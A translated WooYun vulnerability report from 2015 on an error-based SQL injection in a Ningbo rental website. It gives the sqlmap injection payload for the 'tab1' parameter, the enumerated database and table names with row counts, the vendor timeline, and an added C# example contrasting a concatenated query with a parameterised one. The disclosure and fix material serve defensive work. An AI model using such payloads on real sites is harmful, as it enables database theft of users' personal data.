
Vulnerability summary

Defect ID: wooyun-2015-0148088

Title: 宁波租房 (Ningbo Zufang) has a vulnerability exposing [ID, e-mail, phone number, plaintext password, name, address, property company]

Vendor: 宁波租房

Author: me1ody

Submitted: 2015-10-22 09:26

Fixed: 2015-12-10 16:54

Published: 2015-12-10 16:54

Type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-22: details sent to the vendor, awaiting vendor handling
2015-10-26: vendor confirmed; details disclosed to the vendor only
2015-11-05: details disclosed to core white hats and experts in the relevant field
2015-11-15: details disclosed to ordinary white hats
2015-11-25: details disclosed to intern white hats
2015-12-10: details disclosed to the public

Brief description:

Data involved: ID, e-mail, phone number, plaintext password, name, address, property company

Detailed description:

Injection point

http://**.**.**.**/ROlist.aspx?tab1=%ba%cf%d7%e2


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: tab1 (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: tab1=%ba%cf%d7%e2%') AND 8417=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (8417=8417) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113))) AND ('zZkf'='zZkf
---
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [39]:
[*] bbsScan
[*] bbsScan2
[*] cnoolgallery
[*] CnoolKanNB
[*] CnoolPublicSentiment
[*] CnoolPublicSentimentJD
[*] CnoolPublicZX
[*] CnoolTag
[*] db_cnoolcollection
[*] db_forum
[*] db_forum_club
[*] db_forum_cms
[*] db_forum_hall
[*] db_forum_member
[*] db_forum_mypost
[*] db_forum_myrate
[*] db_forum_mytopic
[*] db_forum_police
[*] db_forum_post
[*] db_forum_post2
[*] db_forum_rate
[*] db_forum_ratesearch
[*] db_forum_search
[*] db_forum_topic
[*] db_forum_topictag
[*] db_www_click
[*] JdPublicSentiment
[*] master
[*] model
[*] msdb
[*] NewHouse2012
[*] newshot
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] UCenter
[*] UCenterBusiness
[*] UCenterLog
[*] userrecord
Database: NewHouse2012
[106 tables]
+---------------------------+
| TB_ActionLog |
| TB_Admin |
| TB_Apartment |
| TB_Area |
| TB_BrokerApply |
| TB_Building_Count |
| TB_CarPark |
| TB_CarParkClass |
| TB_CarParkOrder |
| TB_City |
| TB_Code |
| TB_Comment |
| TB_Company |
| TB_CompanyInfo |
| TB_Config |
| TB_DayInMoney |
| TB_DayInMoney_Apply |
| TB_DayMoneyRoster |
| TB_Discount |
| TB_DistrictsDynamic |
| TB_DistrictsInfo |
| TB_DistrictsPicture |
| TB_DistrictsPrice |
| TB_FYB_VoteInfo |
| TB_FYB_VoteRecord |
| TB_FYGFriend |
| TB_FYGGood |
| TB_FYGGoodOrder |
| TB_FYGHouse |
| TB_FYGHouseReward |
| TB_FYGLog |
| TB_FYGMoney |
| TB_FYGMoneyNew |
| TB_FYGMsg |
| TB_FYGOrder |
| TB_FYGRedPacket |
| TB_FYGUser |
| TB_FYGUserPost |
| TB_FYGUserToUser |
| TB_FYGWill |
| TB_FYGWillConfig |
| TB_Gold |
| TB_Gold_Temp |
| TB_Growth |
| TB_Growth_Temp |
| TB_Honest_Temp |
| TB_Identification |
| TB_Image |
| TB_KeyWord |
| TB_LH_Apply |
| TB_LH_Districts |
| TB_LH_Line |
| TB_Log |
| TB_NiceComment |
| TB_Order |
| TB_OrderPay |
| TB_Person |
| TB_Port |
| TB_Port_Temp |
| TB_Product |
| TB_QQ |
| TB_RO_EveryDayInfo |
| TB_RentIn |
| TB_RentIn_New |
| TB_RentOut |
| TB_Score |
| TB_Score_Temp |
| TB_THO_EveryDayInfo |
| TB_TowHandIn |
| TB_TowHandOut |
| TB_TwoHandIn_New |
| TB_TypeName |
| TB_User |
| TB_UserLog |
| TB_WX_Admin |
| TB_WX_Answer |
| TB_WX_AutoReply |
| TB_WX_AutoReplyNews |
| TB_WX_DistrictsImpress |
| TB_WX_DistrictsInfo |
| TB_WX_DistrictsNews |
| TB_WX_FullView |
| TB_WX_Game |
| TB_WX_GameAward |
| TB_WX_GameUser |
| TB_WX_Point |
| TB_WX_ProfessionalComment |
| TB_WX_Question |
| TB_WeiXinActivity |
| TB_WeiXinGameCard |
| TB_WeiXinPicPicList |
| TB_WeiXinPicUser |
| TB_WeiXinPicVote |
| TB_WeiXinProduct |
| TB_WeiXinProductList |
| TB_WeiXinRedPacket |
| TB_WeiXinUser |
| TB_WeixinPicPro |
| sqlmapoutput |
| temp_rentin_20151013 |
| weihouse_Configure |
| weihouse_House |
| weihouse_HouseConfigure |
| weihouse_SurfRecord |
| weihouse_Type |
| weihouse_User |
+---------------------------+
Database: NewHouse2012
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| dbo.TB_Score_Temp | 4210851 |
| dbo.TB_UserLog | 2329721 |
| dbo.TB_Image | 509467 |
| dbo.TB_FYGLog | 385932 |
| dbo.TB_TowHandOut | 235313 |
| dbo.TB_RentOut | 97013 |
| dbo.TB_THO_EveryDayInfo | 37713 |
| dbo.TB_Person | 37181 |
| dbo.TB_Score | 30991 |
| dbo.TB_LH_Apply | 30900 |
| dbo.TB_RO_EveryDayInfo | 29637 |
| dbo.TB_WeiXinUser | 21549 |
| dbo.TB_WeiXinProductList | 13991 |
| dbo.TB_Order | 11176 |
| dbo.TB_DistrictsPicture | 10947 |
| dbo.TB_DistrictsDynamic | 10262 |
| dbo.weihouse_HouseConfigure | 7462 |
| dbo.TB_TowHandIn | 5626 |
| dbo.TB_Company | 5362 |
| dbo.TB_RentIn | 5302 |
| dbo.TB_FYGMsg | 3503 |
| dbo.TB_User | 2742 |
| dbo.TB_Apartment | 2592 |
| dbo.TB_DistrictsPrice | 2463 |
| dbo.weihouse_House | 2463 |
| dbo.TB_Code | 2347 |
| dbo.TB_Log | 2071 |
| dbo.TB_WeiXinGameCard | 1999 |
| dbo.TB_DistrictsInfo | 1948 |
| dbo.weihouse_SurfRecord | 1580 |
| dbo.TB_Area | 1201 |
| dbo.TB_FYGOrder | 1011 |
| dbo.TB_FYGMoneyNew | 941 |
| dbo.TB_Identification | 784 |
| dbo.TB_FYB_VoteRecord | 748 |
| dbo.TB_FYGGoodOrder | 699 |
| dbo.TB_LH_Districts | 523 |
| dbo.TB_WX_GameUser | 502 |
| dbo.TB_FYB_VoteInfo | 336 |
| dbo.TB_FYGUser | 274 |
| dbo.TB_LH_Line | 183 |
| dbo.TB_WeiXinRedPacket | 157 |
| dbo.TB_Config | 148 |
| dbo.TB_FYGUserPost | 140 |
| dbo.TB_WX_DistrictsImpress | 97 |
| dbo.TB_WX_Point | 68 |
| dbo.TB_KeyWord | 67 |
| dbo.TB_QQ | 58 |
| dbo.TB_FYGWillConfig | 48 |
| dbo.TB_Port_Temp | 37 |
| dbo.TB_FYGWill | 34 |
| dbo.TB_FYGHouse | 26 |
| dbo.TB_OrderPay | 25 |
| dbo.TB_FYGFriend | 23 |
| dbo.TB_Growth_Temp | 23 |
| dbo.TB_Product | 20 |
| dbo.TB_Admin | 19 |
| dbo.TB_Discount | 17 |
| dbo.TB_City | 15 |
| dbo.TB_Gold_Temp | 15 |
| dbo.TB_WX_Question | 13 |
| dbo.TB_WX_AutoReplyNews | 12 |
| dbo.TB_WX_GameAward | 12 |
| dbo.weihouse_Configure | 12 |
| dbo.TB_CarPark | 9 |
| dbo.TB_CompanyInfo | 9 |
| dbo.TB_WX_AutoReply | 9 |
| dbo.temp_rentin_20151013 | 9 |
| dbo.weihouse_Type | 9 |
| dbo.TB_Growth | 7 |
| dbo.TB_WeiXinPicVote | 7 |
| dbo.TB_FYGGood | 6 |
| dbo.TB_TypeName | 6 |
| dbo.TB_WeiXinProduct | 6 |
| dbo.TB_CarParkClass | 5 |
| dbo.TB_Port | 5 |
| dbo.TB_RentIn_New | 5 |
| dbo.TB_WeiXinPicPicList | 5 |
| dbo.TB_WX_DistrictsInfo | 5 |
| dbo.TB_WX_Game | 5 |
| dbo.TB_FYGMoney | 4 |
| dbo.TB_WeiXinActivity | 4 |
| dbo.TB_WX_Admin | 4 |
| dbo.TB_BrokerApply | 3 |
| dbo.TB_WeiXinPicUser | 3 |
| dbo.TB_WX_DistrictsNews | 3 |
| dbo.TB_WX_FullView | 3 |
| dbo.weihouse_User | 3 |
| dbo.TB_Gold | 2 |
| dbo.TB_TwoHandIn_New | 2 |
| dbo.TB_WeixinPicPro | 2 |
| dbo.TB_DayMoneyRoster | 1 |
| dbo.TB_WX_Answer | 1 |
| dbo.TB_WX_ProfessionalComment | 1 |
+-------------------------------+---------+


[Screenshot: QQ截图20151020164706.png]

[Screenshot: QQ截图20151020164616.png]

Proof of vulnerability:

As above.

Fix recommendation:

- -
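The report gives no fix, so the following is an added example, not the site's own code. The sqlmap payload above closes `%')` and reopens `('zZkf'='zZkf`, which implies ROlist.aspx builds a parenthesised LIKE filter on `tab1` by string concatenation; the table TB_RentOut comes from the report, while the column name `RentType` and the connection string are assumptions.

```csharp
using System.Data;
using System.Data.SqlClient;

// Added example (not the site's code). TB_RentOut is from the report;
// the column RentType and the connection string are hypothetical.
public static class RentOutList
{
    // Vulnerable shape: tab1 (from the query string) is spliced into the SQL
    // text, so a value like "...%') AND 8417=CONVERT(INT,(SELECT ...)) AND ('zZkf'='zZkf"
    // becomes SQL, and the failed CONVERT surfaces the subquery result in the
    // database error message (error-based injection).
    public static DataTable ListVulnerable(string connStr, string tab1)
    {
        string sql = "SELECT * FROM TB_RentOut WHERE (RentType LIKE '%" + tab1 + "%')";
        using (var conn = new SqlConnection(connStr))
        using (var cmd = new SqlCommand(sql, conn))
        using (var da = new SqlDataAdapter(cmd))
        {
            var dt = new DataTable();
            da.Fill(dt);
            return dt;
        }
    }

    // Fixed shape: the value travels as a typed parameter, so quotes and
    // keywords inside it are data, never SQL. LIKE metacharacters are escaped
    // too, so user input cannot widen the match.
    public static DataTable ListSafe(string connStr, string tab1)
    {
        const string sql =
            "SELECT * FROM TB_RentOut WHERE (RentType LIKE @pattern ESCAPE '\\')";
        using (var conn = new SqlConnection(connStr))
        using (var cmd = new SqlCommand(sql, conn))
        using (var da = new SqlDataAdapter(cmd))
        {
            cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 100).Value =
                "%" + EscapeLike(tab1 ?? string.Empty) + "%";
            var dt = new DataTable();
            da.Fill(dt);
            return dt;
        }
    }

    // Escape the LIKE wildcards (and the escape character itself) for SQL Server.
    public static string EscapeLike(string s)
    {
        return s.Replace("\\", "\\\\").Replace("%", "\\%")
                .Replace("_", "\\_").Replace("[", "\\[");
    }
}
```

Parameterising the query removes the injection; additionally, the site should not return raw database errors to clients, since the error text is the channel this error-based technique reads from.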

Copyright notice: when reposting, please credit the source: me1ody@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-10-26 16:52

Vendor reply:

CNVD confirmed and reproduced the described vulnerability and has transferred it via CNCERT to the corresponding branch center, which will coordinate handling with the organization that operates the website.

Latest status:

None yet

